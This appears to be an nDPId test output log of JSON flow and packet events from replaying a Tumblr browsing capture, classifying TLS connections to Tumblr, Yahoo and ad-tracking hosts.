+00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1605292105447,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292105447,"pkt":"qtsDr8lk5EKm5WPyht1gDBurACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABgBgdJmPABuw7mG3xqPjrugBAB+wS5AAABAQgKE2bkY8Ldntg="} +00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":436,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105418,"flow_last_seen":1605292105448,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":620,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1605292105448,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":437,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1605292105459,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105459,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSABSZgAFAgAAAAAAAAAEAEqAcsBIEmLB5kd7IUo3\/YpAbu4DgNW0a1gJBeUoBJXgDGmAAACBAV4AQMDAwQCCArC3Z7jvgPSEA=="} +00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":438,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1605292105459,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292105459,"pkt":"qtsDr8lk5EKm5WPyht1gCUBCACAGQCoBywEgSYsHmR3shSjf9ikgAUmYABQIAAAAAAAAABABuA4Bu2AkF5QDVtGugBAB+7WdAAABAQgKvgPSKsLdnuM="} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105433,"flow_last_seen":1605292105459,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292105459,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Yahoo","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cookiex.ngd.yahoo.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00988{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":442,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292105418,"flow_last_seen":1605292105494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1605292105494,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":454,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105669,"flow_last_seen":1605292105669,"flow_idle_time":7560000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":1,"thread_ts_msec":1605292105669,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1605292105669,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":206,"pkt_l4_len":152,"thread_ts_msec":1605292105669,"pkt":"qtsDr8lk5EKm5WPyht1gCP\/sAJgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0D3doBu3fKOk4W2C\/9gBhA0URlAAABAQgKBcmbq8LdLRcXAwMAcysuUqnNdP5CtlTC2pWvfZyUMV8UFocs8M6W09NnsspPibPhqobMFIm1f0B4kk13U59rzTyXjGQM3JpbSJkQg4GGmBSNMo7KgMloXnt3GygjcT75OOC0YPo3\/MFdKUwkpDu47ubalsF7IwgRDAn\/l0DFoLo="} +00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1605292105669,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292105669,"pkt":"qtsDr8lk5EKm5WPyht1gCP\/sAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0D3doBu3fKOsYW2C\/9gBhA0ehRAAABAQgKBcmbrMLdLRcXAwMAIgQb59HIMHYAgoaCAJqbMMjq72ntBt\/\/eGErLyXH34Iczsk="} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1605292105669,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":215,"pkt_l4_len":161,"thread_ts_msec":1605292105669,"pkt":"qtsDr8lk5EKm5WPyht1gCP\/sAKEGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0D3doBu3fKOu0W2C\/9gBhA0aEtAAABAQgKBcmbrMLdLRcXAwMAfBkhBkIFqMuMKjD1\/xjqGp2hEKMP3ziLomYjJXbyDDBzMNKC8MmFqfqAj9+xvxfAO7rBldu4UpazYVXmg399TnFcypI7qckvMpQyy6kehQ5F75J5BlTYjgokme9I6h8+9mS8Y6D2WQEp5qh0Ix9\/vReZo1xT0xocl8k7wFQ="} +00676{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":485,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105669,"flow_last_seen":1605292105720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":11638,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1605292105720,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00677{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":485,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105669,"flow_last_seen":1605292105720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":11638,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1605292105720,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":492,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105726,"flow_last_seen":1605292105726,"flow_idle_time":7560000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":127,"midstream":1,"thread_ts_msec":1605292105726,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4c03","src_port":51874,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1605292105726,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":213,"pkt_l4_len":159,"thread_ts_msec":1605292105726,"pkt":"qtsDr8lk5EKm5WPyht1gBYNxAJ8GQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAEwDyqIBu7npntnZTJergBgB9damAAABAQgKLIniTsLdLfkXAwMAepLzP8oRHbXAD5D56fW\/ezxXNRxKdaqM6BwQpjw0zyORx06Rl8gHWinoWY19NxmIXl2owLgVHJ\/UEVkHmda\/PMinu6FgCqLeUi5RUsVJaGqL1ulKRH6Mi5nxYau2z9M9f+jUaBIVXH47AOoxy+jPs5YTh+8Es3OdfTIr"} +00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":493,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1605292105726,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292105726,"pkt":"qtsDr8lk5EKm5WPyht1gBYNxAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAEwDyqIBu7npn1jZTJergBgB9c+fAAABAQgKLIniTsLdLfkXAwMAInb0OIEXDizCLxamWTiLwYinYzi396zhkwGnl1I5tNs4gXU="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":568,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1605292105774,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292105774,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAMAATAMqAcsBIEmLB5kd7IUo3\/YpAbvKotlMl6u56Z9YgBALghHTAAABAQgKwt2gFiyJ4k4="} +00988{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":574,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292105433,"flow_last_seen":1605292105774,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605292105774,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Yahoo","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cookiex.ngd.yahoo.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2777,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292108746,"flow_last_seen":1605292108746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292108746,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2777,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1605292108746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108746,"pkt":"qtsDr8lk5EKm5WPyht1gBAJCACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QYBu4l3wyDoZi2igBBBsd06AAABAQgKqXtZHsLc+wU="} +00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2778,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292108746,"flow_last_seen":1605292108746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292108746,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2778,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1605292108746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108746,"pkt":"qtsDr8lk5EKm5WPyht1gCjLcACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PQBu\/EwVJeVyjqfgBBI2yKLAAABAQgKqXtZHsLc+ww="} +00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2779,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292108747,"flow_last_seen":1605292108747,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292108747,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2779,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1605292108747,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108747,"pkt":"qtsDr8lk5EKm5WPyht1gDu9XACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3RIBuyQ3N5hBwa5pgBAB9TOKAAABAQgKqXtZHsLc+w0="} +00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2780,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292108747,"flow_last_seen":1605292108747,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292108747,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2780,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1605292108747,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108747,"pkt":"qtsDr8lk5EKm5WPyht1gBLbYACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QIBuwaOpKNiTUmPgBAFOCVEAAABAQgKqXtZHsLc+ww="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2790,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1605292108789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108789,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdBuhmLaKJd8MhgBAN560UAAABAQgKwt2r5al1DDM="} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2796,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1605292108796,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108796,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc9JXKOp\/xMFSYgBAPnfW6AAABAQgKwt2r7Kl1DlE="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2797,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1605292108796,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108796,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdEkHBrmkkNzeZgBALy8PxAAABAQgKwt2r7al1DgU="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2798,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1605292108805,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108805,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdAmJNSY8GjqSkgBAMILKCAAABAQgKwt2r9ql1FBI="} +00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2839,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292108895,"flow_last_seen":1605292108895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292108895,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56842,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2839,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1605292108895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292108895,"pkt":"qtsDr8lk5EKm5WPyht1gCOgvACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0D3goBu3qld1IAAAAAoAL9IHkiAAACBAWgBAIICgXJqEYAAAAAAQMDBw=="} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2848,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1605292108917,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292108917,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAMAATQMqAcsBIEmLB5kd7IUo3\/YpAbveCh3iVUV6pXdToBJXgDxxAAACBAV4AQMDAwQCCArC3axnBcmoRg=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2849,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1605292108917,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292108917,"pkt":"qtsDr8lk5EKm5WPyht1gCOgvACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0D3goBu3qld1Md4lVGgBAB+8BsAAABAQgKBcmoXMLdrGc="} +00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2850,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292108895,"flow_last_seen":1605292108918,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292108918,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56842,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"64.media.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2953,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292108895,"flow_last_seen":1605292108973,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":1917,"flow_avg_l4_payload_len":319,"midstream":0,"thread_ts_msec":1605292108973,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56842,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"64.media.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12579,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292114506,"flow_last_seen":1605292114506,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292114506,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12579,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1605292114506,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292114506,"pkt":"qtsDr8lk5EKm5WPyht1gCYCjACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3O4Bu5iknWH70O\/fgBATex8tAAABAQgKqXtvnsLdEcs="} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12580,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1605292114736,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292114736,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc7vvQ79+YpJ1igBBY1dkNAAABAQgKwt3C3al6v1A="} +00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14179,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292116554,"flow_last_seen":1605292116554,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292116554,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 